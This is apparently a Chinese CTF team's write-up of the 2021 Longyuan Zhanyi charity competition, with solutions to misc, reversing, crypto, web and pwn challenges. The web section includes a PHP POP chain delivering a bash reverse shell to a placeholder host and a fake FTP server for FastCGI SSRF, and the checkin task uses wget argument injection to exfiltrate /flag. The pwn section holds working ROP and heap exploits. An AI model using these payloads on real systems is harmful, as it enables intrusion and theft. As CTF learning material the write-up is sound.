2021陇原战疫WP

2021陇原战疫WP

在看到该比赛为公益比赛，获胜者可为甘肃疫情地区提供援助物资时，我们决定以 n03tAck 战队名义参加比赛

安全人员除了技术上的追求，更是要有人的温情。此次比赛 n03tAck 最后取得第二名的成绩，成功为甘肃疫情地区捐赠 5000 元疫情物资，爱是桥梁，大爱无疆，希望我们都是一位有温度的安全爱好者。诚愿疫情早日过去

注：打*的是赛后出的

Misc

soEasyCheckin

base32，但有问题，倒数出现了0$，0-->O,$--->S，得到一串hex。
结果hex那里又有问题，具体是出在83¥6988ee这里
根据规律,每6个字节的第1个字节为e，然后把¥替换成e
得到社会主义核心价值观编码，但是还是有个地方是错误的，中间有一段为：和谐斃明平
然后把他那个斃随便改一下，我改的“富强”
解码得到的SET{Qi2Xin1Xie2Li4-Long3Yuan0Zhan4Yi4}
根据拼音，可以知道是Yuan2
所以最终flag为：

SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4}

打败病毒

游戏打开之后发现在末地，打完末影龙后没有反应，flag藏在终末之诗里，于是直接去找文本
在.minecraft/version/陇原战“疫”.jar下
将其改为zip，找到assets/minecraft/texts/end.txt，得到11F9sACbBBBWKTiClYDtNF2yIEfThXdfIGPxF
base62解码即可

SETCTF{Fi9ht1ng_3ItH_V1rUs}

SOS

拨号音，踩正确的来组合出flag
用手机录音，然后m4a格式转wav格式，之后DTMF，因为录的总有问题，所以一共录了三次

前面都没出现8，这次终于出现了8，所以应该是6830AB1C75，得到flag

EasySteg

哥哥球球了别套了再套下去套神都哭了呜呜呜

JK为单图盲水印(java)，用imagein也行的

然后在flag.rar的注释里面有一串tab和space组成的密文，转space转0，tab转1

然后解压，在flag.png的末尾有另一个png，那个png明显有flag字样，用stegsolve反一下色即可看清

flag{156cca8e

然后还在这个图片后面发现了明显的oursecret的特征，结合上面的base64(-b81b-)

得到oursecret的密码为LWI4MWIt

除了数字以外，没有重复字符，里面还有{}，结合01串，得出为哈夫曼编码，利用红明谷的脚本即可解码

对应关系看脚本即可理解

import copy
import re

def dfs(c, d):
    if len(c.keys()) == 1:
        # g = {'j':29,'z':31,'7':25,'e':31,'l':23,'6':37,'4':32,'p':38,'h':27,'g':26,'x':28,'i':25,'u':27,'n':25,'8':36,'0':24,'o':23,'c':28,'y':24,'1':29,'b':26,'m':27,'2':28,'v':25,'d':33,'f':28,'9':33,'t':21,'w':22,'a':31,'r':24,'s':16,'k':32,'5':25,'q':23,'3':32,'{':1,'-':4,'}':1,}
        # num = 0
        # for k in g.keys():
        #     num += g[k] * len(d[k])
        # print(num)
        # print(c, d)
        g = {}
        for k in d.keys():
            g[d[k]] = k
        a = '1110111111000100001111000011010001101111100110100011110111100010100111110111001101111100011000111111111101011100011111100111000011010001111010011011111001110111100010000111001110011110111000111111100111011111011011101011110111110101101101101000110101011101011111111011110111101101110101111010011010110100011100100011010101111010111110110110111100011010111010111110110110111001001011011110100111010111111010111111011110111101001111010111110111101011100100111100101011011101110111111001010110100100110111110011111001101000111110111001011001110000111000011110000110111110011000011100001101100110100011100001111110011110000110110011010001110011101100001110110001001111111110010110011010001111011110110010011011111000001111100010010001001111101110110111111101101001001001011011101111101101101111001101001011011111100111110110110110110111110111010110111011110011111011011011010000110111111001111110111100111010111110011010011011110101001101110111100110110111101001101011101011111001101111011101101010111010111111001111110111010110110110101001101011111101001101000111010010111000010011001110111110111101101111101101110111010110100101101101101011010111111101111001110111111110011010110100101101111011011101100111001000001111001100100101011000000111100101011001000101100100000011001011001001000001111001100100101011000000111100101011001011111111001010001010001010010000011110011001001010110000001111001010110010001011001010001010000111100100000111100110010010101100000011110010101100101010010101100101010010000011110011001001010110000001111001010110010011001001010110000011011111001000001111001100100101011000000111100101000101000110111110010000001100101010010000011110011001001010010101100000011110010101100100010001001000011111110001010010000011110011001001010110000001111001010110010111111110010100010110001000100100000111100110010010101100000011110010100010100011011111001000000110010101001000001111001100100101011000000111100101011001001100100101011000001101111100100000111100110010010101100000011110010101100100010110010000001100101100100100000111100110010010101100000011110010100010100010100101011000001101111100100000111100110010010101100000011110010100101011001000101100100000011001011001001000001111001100100101011000000111100101011001011111111001010001010001010010000011110011001001010110000001111001010110010001000100100001111111000101001000001111001100100101011000000111100101011001000101100100000011001011001001000001111001100100101011000000111100101011001010100100000011001011111111001000001111001100100101011000000111100101011001000101100100000011001011001001000001111001100100101011000000111100101011001000100010010100100001111111000101001000001111001100100101011000000111100101011001010100100000011001011111111001000001111001100100101011000000111100101000101000101001010110000011011111001000001111001100100101011000000111100101000101000110111110010000001100000011110010000011110011001001010110000001111001010001010000001001010001010000111111011010011110011101011111011100001011010110101111010001111100110111110101111110110101010011101111101100100000101111011010111101101101110011001110001100011111001110010000010111100010111101111111101101101110000111010000101111110001100000110001110010100100000110000101110000100010110111100000101110011111110000111011010111101001101001101111101000100101111101101011111100111111001110001100001000011011111000001111100010011001110111101111111011111001000111000011101101110000111011011110011101111111011011010110100011111000100101111111011100000100000101110010111100011010110100011111101111001110101111010111011011100100110011101111100111101111100000001001001101001101111111101101011110111011110011101001101111010100110111011101011110011100000011010010111111000100110011101111101011110111110111'
        m = ''
        st = 0
        while st < len(a):
            ed = st + 1
            while ed <= len(a):
                if a[st:ed] in g.keys():
                    m += g[a[st:ed]]
                    break
                else:
                    ed += 1
            st = ed
        print(m)

    else:
        k0 = list(c.keys())[0]
        k1 = list(c.keys())[1]
        if c[k0] > c[k1]:
            k0, k1 = k1, k0
        for k in list(c.keys())[2:]:
            if c[k] < c[k1]:
                if c[k] < c[k0]:
                    k0, k1 = k, k0
                else:
                    k1 = k
        for a in k0:
            d[a] = '0' + d[a]
        for a in k1:
            d[a] = '1' + d[a]
        c[k0+k1] = c[k0]+c[k1]
        del c[k0]
        del c[k1]
        dfs(copy.deepcopy(c), copy.deepcopy(d))

c = {'n':9,'S':2,'B':3,'I':6,'U':6,'L':1,'O':3,'R':2,'F':3,'Y':1,'G':2,'H':3,'v':9,'N':2,'M':1,'Z':1,'D':6,'T':1,'h':18,'o':16,'u':17,'b':9,'s':7,'r':4,'g':8,'f':10,'a':14,'m':2,'i':20,'p':2,'e':14,'w':7,'q':2,'y':8,'P':1,'J':2,'E':2,'C':1,'V':1,'A':1,'j':4,'k':5,'x':5,'t':3,'c':6,'8':24,'9':56,'{':1,'3':217,'d':97,'4':83,'6':54,'0':25,'1':12,'2':10,'5':8,'7':10,'}':1,'l':4,'Q':1,'W':1,'z':1}
d = {}
for k in c.keys():
    d[k] = ''
dfs(copy.deepcopy(c), copy.deepcopy(d))

#nSBIULORFYGHvNMIOUZSDTNhnoubuosrgfbouvasmruiohauiopewgvfbwuivpqynqwUPIFJDDBUEDUIDHBUIDCVHJIOAejikxneiwkyiohwehiooiuyhiosehfhuiaetyhovauieyrghfuotgvac89xcboiyuweagihniaweo{3d46303d39463d39383d41393d46303d39463d39323d38433d46303d39463d39383d38463d46303d39463d39333d39333d46303d39463d39303d39453d46303d39463d38453d41333d46303d3d39463d39373d42433d46303d39463d39323d38373d46303d39463d38453d41333d46303d39463d39303d39453d46303d39463d39383d41393d46303d39463d38433d39453d46303d39463d3d39383d41393d46303d39463d39323d38433d46303d39463d39373d42433d46303d39463d39383d41393d46303d39463d39333d41323d46303d39463d39383d41393d46303d39463d39373d3d42433d46303d39463d39333d41323d46303d39463d38433d39453d46303d39463d38453d41463d46303d39463d38443d3846}huilagsieufrcb78QWEGF678Rniolsdf149687189735489246avaeukighf6497ejixcnbmlolohnbasik2647893hasfhuvzxchbjkaefgyhuetyuhjadfxcvbn

{}里面的内容拿去hex，发现是Quoted Printable，但是有些地方出现了两次==，于是将其重复的删掉，得到

😩💌😏📓🐞🎣🗼💇🎣🐞😩🌞😩💌🗼😩📢😩🗼📢🌞🎯🍏

不是base100，所以拿去试试国外的一种，以前做la佬的ctfshow月饼杯_共婵娟用到的

https://github.com/pavelvodrazka/ctf-writeups/tree/master/hackyeaster2018/challenges/egg17

拼接起来，得到flag

flag{156cca8e-b81b-4157-9f39-4c41f4a4facb}

*ez_misc

hint是零宽，说的是和piet很像的一种esolang，然后结合ctfshow6月赛八神的babyLSBwithHelicopter

可以知道是brainloller

然后010打开，提示解出来是后面steghide的密码，并且CRC报错，用爆CRC的脚本一爆就发现正确宽度为14，高为12

用bftools解，bftools.exe decode brainloller bf.png，得到的bf再去解码得到密码Hello Worl

但是解不出来，于是用我6月赛写的脚本去解https://blog.csdn.net/qq_42880719/article/details/117479024

解出来是Hello Worle!，我猜是Hello World!

结合题目新上的hint，得到的密码我试过有

Hello Worl
Hello_Worl
Hello Worle!
Hello_Worle!
Hello World!
Hello_World!
Hello World
Hello_World

可惜都不对，通过出题人的朋友问了下出题人，他朋友也表示解不出来，但是出题人是能解出来的(好像用的是本地的附件)
所以我总感觉是比赛题目附件的问题？

—17:02—:经过一个半小时的积极反馈

就bftools.exe解出来的把空格替换为下划线Hello_Worl解steghide，得到个文本
后面是一个熊曰，然后就完事

Re

EasyRe

flag就在常量里面。。

flag{fc5e038d38a57032085441e7fe7010b0}

findme

发现判断长度为26位

tls，找到主逻辑，发现是一个没有魔改的rc4.
那当然是用他流密码的性质做。我们输入26个0，然后得到最后的密文，然后在异或得到密钥流，在异或我们的比对密文。即可得到flag

s=[  0xD4, 0x27, 0xE1, 0xB2, 0xF4, 0x9F, 0x4C, 0xDC, 0xBC, 0x1B,
  0x80, 0xD2, 0x44, 0x8B, 0xEA, 0x33, 0x02, 0x4E, 0x41, 0xEB,
  0x8D, 0x23, 0x6F, 0xBC, 0x00, 0x8B]
d='00000000000000000000000000'
a=[0xFFFFFFB7, 0x00000052, 0xFFFFFF85, 0xFFFFFFC1, 0xFFFFFF90, 0xFFFFFFE9, 0x00000007, 0xFFFFFFB8, 0xFFFFFFE4, 0x0000001A, 0xFFFFFFC3, 0xFFFFFFBD, 0x0000001D, 0xFFFFFF8E, 0xFFFFFF85, 0x00000046, 0x00000000, 0x00000021, 0x00000044, 0xFFFFFFAF, 0xFFFFFFEF, 0x00000070, 0x00000032, 0xFFFFFFB5, 0x00000011, 0xFFFFFFC6]
for i in range(len(a)):
    print((chr(s[i]^ord(d[i])^(a[i]&0xff))),end='')
#SETCTF{Th1s_i5_E2_5tRcm9!}

arm

打开入眼就是sbox，然后最下面主函数那里出现了很多aes，然后也看到了key，然后发现是cbc模式？但是解密出来前16位是对得，然后尝试ecb模式。直接得到flag

from Crypto.Cipher import AES
key=b'this_is_a_key!!!'
enc=long_to_bytes(0x1030a9254d44937bed312da03d2db9adbec5762c2eca7b5853e489d2a140427b)
ae=AES.new(key,AES.MODE_ECB)
print(ae.decrypt(enc))

easyre++

花指令，去掉，我全部nop了，发现还差v4，然后再nop之前，下断得到v4得值
v4=[0x271E150C, 0x3B322920, 0x5F564D44, 0x736A6158, 0x978E857C, 0xABA29990, 0xCFC6BDB4, 0xE3DAD1C8]

直接z3

v4=[0x271E150C, 0x3B322920, 0x5F564D44, 0x736A6158, 0x978E857C, 0xABA29990, 0xCFC6BDB4, 0xE3DAD1C8]
from z3 import *
s=Solver()
a = [BitVec(f'a[{i}]', 32) for i in range(8)]
v5=[]#this_is_a_key!!!
for i in range(8):
    v5.append(a[i]^v4[(7 * i + 2) % 8])
print(v5)
for j in range(8):
    v5[j] ^= (v5[j] << 7)
    v5[j] ^= v4[(7 * j + 3) % 8]
    v5[j] ^= v5[(5 * j + 3) % 8]
    v5[j] ^= (v5[j] << 13)
    v5[j] ^= v4[(7 * j + 5) % 8]
    v5[j] ^= (v5[j] << 17)
en=[0xEEE8B042, 0x57D0EE6C, 0xF3F54B32, 0xD3F0B7D6, 0x0A61C389, 0x38C7BA40, 0x0C3D9E2C, 0xD64A9284]
print(len(en))
for i in range(8):
    s.add(v5[i]==en[i])
print(s.check())
m=s.model()
from Crypto.Util.number import *
d=b''
for i in range(8):
    d+=long_to_bytes(m[a[i]].as_long())[::-1]
print(d)
#b'bd6a64f17bb3dc065b41a0aad1e48e98'

*Eat_something

wasm逆向。

另存为本地文件，发现base64加密了。。解密一下，然后保存为

wasm.wasm，然后用wasm2c 反编译成 c文件，然后再编译.c文件，

首先看到check函数入口

然后用ida打开，找到对应函数

结合动调，发现就是一个简单的异或

s=[  0x86, 0x8B, 0xAA, 0x85, 0xAC, 0x89, 0xF0, 0xAF, 0xD8, 0x69,
  0xD6, 0xDD, 0xB2, 0xBF, 0x6E, 0xE5, 0xAE, 0x99, 0xCC, 0xD5,
  0xBC, 0x8B, 0xF2, 0x7D, 0x7A, 0xE3]

for i in range(len(s)):
    print(chr((s[i]^i)//2),end='')
#CETCTF{Th0nk_Y0u_DocTOr51}

Crypto

mostlycommom

签到rsa，首先共模攻击，但是e1,e2不互素，公因数只有一个2，所以直接尝试开方就出了。

from gmpy2 import *
from Crypto.Util.number import *

def modulus(n,e1,e2,c1,c2):
    
    _,s,t = gcdext(e1, e2)
    m = (pow(c1,s,n) * pow(c2 , t , n)) % n
    print(long_to_bytes((iroot(m,2)[0])))
    
N=122031686138696619599914690767764286094562842112088225311503826014006886039069083192974599712685027825111684852235230039182216245029714786480541087105081895339251403738703369399551593882931896392500832061070414483233029067117410952499655482160104027730462740497347212752269589526267504100262707367020244613503
c1=39449016403735405892343507200740098477581039605979603484774347714381635211925585924812727991400278031892391996192354880233130336052873275920425836986816735715003772614138146640312241166362203750473990403841789871473337067450727600486330723461100602952736232306602481565348834811292749547240619400084712149673
c2=43941404835820273964142098782061043522125350280729366116311943171108689108114444447295511969090107129530187119024651382804933594308335681000311125969011096172605146903018110328309963467134604392943061014968838406604211996322468276744714063735786505249416708394394169324315945145477883438003569372460172268277
e1 = 65536
e2 = 270270
print(gcd(e1,e2))
modulus(N,e1,e2,c1,c2)
#SETCTF{now_you_master_common_mode_attack}

give cat for Prince

CBC模式，需要我们构造密文，给了iv，并且我们每次利用系统解密都可以自己选择iv，所以其实就很简单了，一个CBC的构造

from gmpy2  import *
from hashlib import *
from Crypto.Util.number import *
from pwn import *
import string

p=remote('node4.buuoj.cn',29764)
table = string.ascii_letters + string.digits
context.log_level='debug'

def pow_of_work(end,sha):
    for a in table:
        for b in table:
            for c in table:
                for d in table:
                    s=(a+b+c+d)+end
                    if sha256( s.encode() ).hexdigest()==sha:
                        return (a+b+c+d)
p.recvuntil('[+] sha256(XXXX+')
end=p.recv(8).decode()
p.recvuntil(') == ')
sha=p.recvuntil('\n')[:-1].decode()
xxxx=pow_of_work(end,sha)
p.recvuntil('[+] Give Me XXXX :')
p.sendline(xxxx)
name=b'dbty'*4
premission=b'Princepermission'
p.recvuntil('2.Go away')
p.sendline('1')
p.sendline('dbty'*4)
p.recvuntil('Miao~ ')
iv=p.recvuntil('\n')[:-1]
p.recvuntil('3.say Goodbye')
p.sendline('1')
p.recvuntil('Permission:')
enc=p.recvuntil('\n')[:-1]
print(enc.hex())

from Crypto.Util.strxor import *

p.sendline('2')
p.recvuntil('Looks like you want to know something. Give me your permission:')
p.sendline(iv+enc[16:])
p.recvuntil('Miao~ ')
p.sendline(iv)
p.recvuntil('The message is ')
plain=p.recvuntil('\n')[:-1]

print(plain)
dec_c2=strxor(iv,plain[16:])
c1=strxor(b'Princepermission',dec_c2)


p.sendline('2')
p.recvuntil('Looks like you want to know something. Give me your permission:')
p.recvuntil('[-] ')
p.sendline(c1+enc[16:])
p.recvuntil('Miao~ ')
p.recvuntil('[-] ')
p.sendline(iv)
p.recvuntil('The message is ')

plain=p.recvuntil('\n')[:-1]
print(plain)
dec_c1=strxor(iv,plain[:16])
ivv=strxor(dec_c1,name)

#p.recvuntil('Give me your permission:')
p.recvuntil('[-] ')
p.sendline(c1+enc[16:])
#p.recvuntil('What\'s the cat tell you?')
p.recvuntil('[-] ')
p.sendline(ivv)
p.recvall()

easytask

一看就是原题，上谷歌搜到个轮子直接梭掉了 https://hxp.io/blog/26/VolgaCTF-2016-Quals-crypto300-XXY-writeup/

from sage.modules.free_module_integer import IntegerLattice

w = ['[-10150241248 -11679953514  -8802490385 -12260198788 -10290571893   -334269043 -11669932300  -2158827458     -7021995]',
    '[ 52255960212  48054224859  28230779201  43264260760  20836572799   8191198018  14000400181   4370731005     14251110]',
     '[  2274129180  -1678741826  -1009050115   1858488045    978763435   4717368685   -561197285  -1999440633     -6540190]',
     '[ 45454841384  34351838833  19058600591  39744104894  21481706222  14785555279  13193105539   2306952916      7501297]',
     '[-16804706629 -13041485360  -8292982763 -16801260566  -9211427035  -4808377155  -6530124040  -2572433293     -8393737]',
     '[ 28223439540  19293284310   5217202426  27179839904  23182044384  10788207024  18495479452   4007452688     13046387]',
     '[   968256091  -1507028552   1677187853   8685590653   9696793863   2942265602  10534454095   2668834317      8694828]',
     '[ 33556338459  26577210571  16558795385  28327066095  10684900266   9113388576   2446282316   -173705548      -577070]',
     '[ 35404775180  32321129676  15071970630  24947264815  14402999486   5857384379  10620159241   2408185012      7841686]']
W=[]
for i in w:
    temp=i[1:-1].split()
    temp=[int(j) for j in temp]
    W.append(temp)

W=matrix(W)
e='[151991736758354 115130361237591  58905390613532 130965235357066  74614897867998  48099459442369  45894485782943   7933340009592     25794185638]'
E=e[1:-1].split()
e=[int(i) for i in E]
print(e)
e=matrix(e)

B = W.stack(e).augment(vector([0] * W.ncols() + [1]))
d = IntegerLattice(B).shortest_vector()
print('d = {}'.format(d))
d=vector([-3, -2, -3, 0, -3, 2, 2, 0, 2])
xxx=[151991736758357, 115130361237593, 58905390613535, 130965235357066, 74614897868001, 48099459442367, 45894485782941, 7933340009592, 25794185636]
m = W.solve_left(vector(xxx))
print('m = {}'.format(m))
M=[877, 619, 919, 977, 541, 941, 947, 1031, 821]
key = hashlib.sha256(str(M).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
c=unhexlify('1070260d8986d5e3c4b7e672a6f1ef2c185c7fff682f99cc4a8e49cfce168aa0')
print(cipher.decrypt(c))
#flag{be5152d04a49234a251956a32b}

Web

eaaasyphp

原题改编，在 Geek Challenge 2021中有

<?php

class Check {
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {

    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {

    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            throw new Error("Error");
        }
    }
}

if (isset($_GET['code'])) {
    unserialize($_GET['code']);
} else {
    highlight_file(__FILE__);
}

这里设置了两个 static 变量，所以得先让他们为 true 才能继续进行，逻辑很清楚，最终构造的pop链子

<?php

class Esle
{
}

class Hint
{
    public function __construct()
    {
        $this->hint = "phpinfo";
    }
}


class Bunny
{
    public function __construct()
    {
        $this->filename = "ftp://bbb@xxx:23/aaa";
        $this->data = urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH106%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00j%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/xxxxx/5000%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00");
    }
}

class Welcome
{
    public function __construct()
    {
        $this->username = new Bunny();
    }
}

class Bypass
{

    public function __construct()
    {
        $this->str4 = new Welcome();
    }
}
echo urlencode(serialize(array(new Esle(), new Bypass())));

之前试过直接写还有各种方法，估计是没有权限根本写不上，但是还可以利用FTP - SSRF 来攻击 FPM/FastCGI造成命令执行
参考文章: 浅入深出 Fastcgi 协议分析与 PHP-FPM 攻击方法
首先使用 gopherus 生成payload：

然后在VPS上放置一个py脚本

# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

运行脚本，并多开一个终端开启监听，然后发送payload

vps上收到反弹shell

*CheckIN

审计源码


wget 路由存在参数注入，构造payload

http://b6cd46d7-79b1-4321-9cb9-94a9ad7f216d.node4.buuoj.cn:81/wget?argv=dotast&argv=--post-file&argv=/flag&argv=http://ip:port/

然后远程vps监听端口

发送请求后，vps收到flag

Pwn

pwn1

给了任意写和栈溢出，先用任意写改stack_check_fail的got表为puts的plt，实现canary绕过，再直接ROP就行了。

from pwn import *

p=process('./pwn1')
#p=remote('node4.buuoj.cn',27412)
elf=ELF('./pwn1')
context.log_level='debug'
#libc=ELF('libc-2.23.so')
libc=elf.libc
rdi=0x0000000000400a03

p.sendlineafter('your choice','0')
p.sendlineafter('address:\n',str(0x601020))
p.sendlineafter('content:\n',p64(elf.plt['puts']))
p.sendlineafter('address:\n','-1')
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x200))
p.sendlineafter('content:\n','A'*0x110+'b'*8+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40090b))
p.sendlineafter('your choice\n','-1')
puts=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
success('puts:'+hex(puts))
libc_base=puts-libc.sym['puts']
success('libc_base:'+hex(libc_base))

sh=libc_base+libc.search('/bin/sh').next()
system=libc_base+libc.sym['system']

p.sendlineafter('your choice','0')
p.sendlineafter('address:\n',str(0x601020))
p.sendlineafter('content:\n',p64(elf.plt['puts']))
p.sendlineafter('address:\n','-1')
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x200))
p.sendlineafter('content:\n','A'*0x110+'b'*8+p64(0x00000000004005d9)+p64(rdi)+p64(sh)+p64(system))
p.sendlineafter('your choice\n','-1')
p.interactive()

pwn2

有uaf漏洞，直接打__malloc_hook+onegadget就行了。

from pwn import *

p=remote('node4.buuoj.cn',29868)
libc=ELF('/home/root2/Desktop/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so')
context.log_level='debug'

def add(id):
	p.sendafter('Input your choice: \n','1\n1\n')
	p.sendafter('Input the idx\n',str(id)+'\n'+str(id)+'\n')

def edit(id,con):
	p.sendafter('Input your choice: \n','2\n2\n')
	p.sendafter('Input the idx\n',str(id)+'\n'+str(id)+'\n')
	p.sendafter('Input the Magic\n',str(con))

def delete(id):
	p.sendafter('Input your choice: \n','3\n3\n')
	p.sendafter('Input the idx\n',str(id)+'\n'+str(id)+'\n')

add(0)
add(1)
edit(0,'a')
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x7f1df4510d61+0x7f1df414c000
success('libc_base:'+hex(libc_base))

delete(0)
edit(0,p64(libc_base+libc.sym['__malloc_hook']-0x23))

add(0)
add(1)
edit(1,'a'*0x13+p64(libc_base+0xf03a4))

add(0)
#gdb.attach(p)
p.interactive()